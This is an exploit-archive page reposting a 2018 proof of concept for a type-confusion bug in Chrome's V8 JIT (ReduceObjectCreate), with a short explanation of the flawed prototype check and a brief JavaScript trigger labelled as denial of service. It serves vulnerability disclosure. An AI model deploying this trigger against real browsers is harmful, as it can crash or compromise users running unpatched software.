Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null" Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-03-06 | Type : dos | Platform : multiple
This exploit / vulnerability Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null" is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/*
I think this commit has introduced the bug.
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2

According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".

The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
return NoChange();
}
instance_map = Map::GetObjectCreateMap(prototype_const);

PoC:
*/

var object;
function opt() {
opt['x'] = 1.1;
try {
Object.create(object);
} catch (e) {
}

for (let i = 0; i < 1000000; i++) {

}
}

opt();
object = opt;
opt();

Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null"


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null" Vulnerability / Exploit